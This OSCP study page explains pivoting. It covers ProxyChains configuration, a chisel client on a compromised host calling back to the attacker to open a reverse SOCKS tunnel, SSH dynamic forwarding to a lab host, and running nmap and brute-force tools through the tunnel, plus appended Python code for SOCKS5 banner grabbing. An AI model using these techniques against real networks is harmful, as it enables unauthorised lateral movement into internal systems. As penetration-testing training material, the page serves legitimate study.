OSCP 2022 Materials

Pivoting ( ProxyChains )

Last updated 2 years ago

Pivoting lets the attacker reach the services and machines that a compromised host can talk to but that are not routable from the attacker's machine.

Pivoting enlarges the attack surface: traffic is sent as if it originated from the compromised, network-connected machine, so internal hosts see a connection from a peer they already accept.

Tools required:

  • ProxyChains

sudo apt install proxychains

(On Kali the maintained fork is packaged as proxychains4 / proxychains-ng and reads /etc/proxychains4.conf; the older proxychains package reads /etc/proxychains.conf. Edit whichever file the installed binary actually uses.)

  • SSH or chisel, to create the SOCKS listener that proxychains forwards through

Why: with proxychains, tools that are not available on the compromised machine (e.g. medusa, nmap) can be run from the attacker's machine while their TCP connections are routed through the compromised host into the internal network.

kali -> proxychains -> SOCKS listener -> compromised_machine -> internal_machine:80 (the request appears to come from compromised_machine)

Exploitation

  • Install proxychains on the attacker's machine.

  • Configure the local port proxychains will send traffic to, with the proxy type set to SOCKS (socks5 works for both ssh -D and chisel).

sudo vi /etc/proxychains.conf

# [ProxyList] is the last section of the file. Comment out the default
# "socks4 127.0.0.1 9050" line (9050 is Tor's SOCKS port); under the
# default strict_chain a proxy that is not running makes every connection fail.
# add the following
# socks5 127.0.0.1 <some port>
socks5 127.0.0.1 9051

  • Set up dynamic port forwarding on that port, with SSH or chisel (next sections), and confirm something is listening on it on the attacker's machine before launching tools through proxychains.

Chisel

  • When no SSH credentials are available (or SSH is not reachable), use chisel to create the SOCKS proxy instead. Chisel is needed on both ends: the server binary on the attacker's machine and a client binary (Linux or Windows build) uploaded to the compromised machine.

  • Start a chisel server on the attacker's machine; --reverse allows the client to open listeners on the server side:

# attacker IP: 192.168.1.1
# syntax: ./chisel server -p {port} --reverse
./chisel server -p 1337 --reverse

  • On the compromised machine, connect back to the attacker's server and request a reverse SOCKS proxy:

# syntax: chisel client {attacker IP}:{port on chisel server} R:socks
./chisel client 192.168.1.1:1337 R:socks   # on a Linux (e.g. Debian-based) machine
chisel.exe client 192.168.1.1:1337 R:socks  # on a Windows machine

  • Once the client has connected, the chisel server on the attacker's machine logs the local port on which the SOCKS proxy is listening:

2021/01/15 17:11:47 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

  • By default the reverse SOCKS proxy listens on 127.0.0.1:1080, so point proxychains at that port:

sudo vi /etc/proxychains.conf

# comment the last line 9050 --> used by TOR
# add the following
socks5 127.0.0.1 1080

  • Now tools can be run through proxychains. Caveat: proxychains only redirects TCP connections made through the C library, and a SOCKS proxy only carries TCP. nmap therefore needs a full-connect scan with host discovery disabled (-sT -Pn); SYN scans (-sS, the default as root), ICMP ping and UDP scans bypass the proxy or fail. A full -p- scan through a proxy is slow, so scan a short list of likely ports first.

proxychains nmap -sT -Pn -p- internalIp

SSH

  • With valid SSH credentials for the compromised machine, dynamic port forwarding opens the SOCKS listener directly:

ssh -D 9051 charix@10.10.10.84 # 9051 is the port configured in proxychains.conf; add -N to keep the forward without opening a shell

  • Once the session is up, the attacker can run tools through proxychains against the internal network.

  • Legend (for the "Proxychains with SSH" screenshot below)

    • 1 - Added the port 9051 to the /etc/proxychains.conf file

    • 2 - Inspecting port 9051 on the attacker's machine (before the forward)

    • 3 - Dynamic port forwarding to the port configured in proxychains (-D 9051)

    • 4 - Activity on port 9051 on the attacker's machine (after the forward)

    • 5 - Grabbing the banner of the service on port 25 directly on the compromised machine

    • 6 - Using proxychains from the attacker's machine to obtain the same banner on port 25 through the tunnel

Brute-force and other automated attack tools (e.g. medusa) can be run through proxychains in the same way.
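Legend items 5 and 6 grab a service banner directly and then through proxychains. The following is an added example, not code from the original page, that performs the proxychains part by hand: the SOCKS5 exchange (RFC 1928) that proxychains injects into a tool's connect() call, against the listener opened by `ssh -D 9051` or `chisel ... R:socks`, followed by a read of the service's greeting. It is a quick way to verify that the tunnel really reaches an internal host before pointing nmap or medusa at it. The self-tests use a minimal SOCKS5 proxy, a fake SMTP service and a banner that are all constructed here, so the file runs offline; the host names, ports and function names are assumptions.

```python
"""SOCKS5 banner grab by hand: the exchange proxychains performs for a tool.

Added example, not code from the original page. Greeting, method selection,
CONNECT and reply per RFC 1928, then the service's first bytes. The stand-in
proxy and SMTP service below are constructed for the self-tests.
"""
import socket
import struct
import threading

VER, NO_AUTH, CONNECT = 5, 0x00, 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04


def _recv_exact(sock, n):
    buf = b""                                    # SOCKS replies are fixed-layout: no short reads
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection mid-handshake")
        buf += chunk
    return buf


def socks5_connect(proxy, target, timeout=5.0):
    """Return a socket connected to target=(host, port) through proxy=(host, port)."""
    s = socket.create_connection(proxy, timeout=timeout)
    s.sendall(bytes([VER, 1, NO_AUTH]))          # offer one method: no authentication
    ver, method = _recv_exact(s, 2)
    if (ver, method) != (VER, NO_AUTH):
        s.close()
        raise ConnectionError(f"proxy refused no-auth (ver={ver}, method={method:#x})")
    host, port = target
    try:                                         # literal IPv4 -> ATYP 1
        dst = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:                              # hostname -> ATYP 3, resolved by the proxy
        name = host.encode()                     # (this is what proxychains' proxy_dns does)
        dst = bytes([ATYP_DOMAIN, len(name)]) + name
    s.sendall(bytes([VER, CONNECT, 0]) + dst + struct.pack("!H", port))
    ver, rep, _rsv, atyp = _recv_exact(s, 4)
    # length of BND.ADDR depends on ATYP; skip it and BND.PORT, they are not needed here
    n = _recv_exact(s, 1)[0] if atyp == ATYP_DOMAIN else 16 if atyp == ATYP_IPV6 else 4
    _recv_exact(s, n + 2)
    if rep != 0:                                 # e.g. 0x05 = target refused the connection
        s.close()
        raise ConnectionError(f"CONNECT {host}:{port} failed, REP={rep:#x}")
    return s


def grab_banner(proxy, target, nbytes=512):
    """First bytes the internal service sends (SMTP, FTP and SSH greet first)."""
    with socks5_connect(proxy, target) as s:
        return s.recv(nbytes).decode(errors="replace").strip()


def _serve_once(handler):
    """Serve one client on an ephemeral localhost port in a thread; return the port."""
    lst = socket.socket()
    lst.bind(("127.0.0.1", 0))
    lst.listen(1)
    def run():
        conn, _ = lst.accept()
        with conn:
            handler(conn)
        lst.close()
    threading.Thread(target=run, daemon=True).start()
    return lst.getsockname()[1]


def _fake_socks5(conn):
    """Constructed no-auth SOCKS5 proxy: parse CONNECT, dial the target, relay one read."""
    _ver, nmethods = _recv_exact(conn, 2)
    _recv_exact(conn, nmethods)
    conn.sendall(bytes([VER, NO_AUTH]))
    _ver, _cmd, _rsv, atyp = _recv_exact(conn, 4)
    if atyp == ATYP_IPV4:
        host = socket.inet_ntoa(_recv_exact(conn, 4))
    else:
        host = _recv_exact(conn, _recv_exact(conn, 1)[0]).decode()
    (port,) = struct.unpack("!H", _recv_exact(conn, 2))
    try:
        upstream = socket.create_connection((host, port), timeout=5)
    except OSError:
        conn.sendall(bytes([VER, 0x05, 0, ATYP_IPV4]) + bytes(6))   # REP=5: refused
        return
    with upstream:
        conn.sendall(bytes([VER, 0x00, 0, ATYP_IPV4]) + bytes(6))   # REP=0: succeeded
        conn.sendall(upstream.recv(512))


def selftest(banner=b"220 mail.internal.lab ESMTP Postfix (constructed banner)\r\n"):
    """Fake SMTP behind the fake proxy: returns the banner as seen through the proxy."""
    smtp_port = _serve_once(lambda c: c.sendall(banner))
    proxy_port = _serve_once(_fake_socks5)
    return grab_banner(("127.0.0.1", proxy_port), ("127.0.0.1", smtp_port))


def selftest_refused():
    """Closed internal port: the proxy answers REP=5 and the client fails fast."""
    with socket.socket() as probe:               # grab a free port, then release it
        probe.bind(("127.0.0.1", 0))
        dead_port = probe.getsockname()[1]
    proxy_port = _serve_once(_fake_socks5)
    try:
        grab_banner(("127.0.0.1", proxy_port), ("127.0.0.1", dead_port))
    except ConnectionError as e:
        return str(e)
    return None
```

Against a real pivot, call grab_banner(("127.0.0.1", 9051), ("10.10.10.84", 25)) with the ssh -D session up (or port 1080 for chisel); a REP other than 0 means the compromised host could not reach the target, which separates a broken tunnel from a filtered internal port before any scanner is involved.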

[Images: pivoting diagram by VickieLi; screenshots "Proxychains with chisel", "Legend", "Proxychains with SSH"]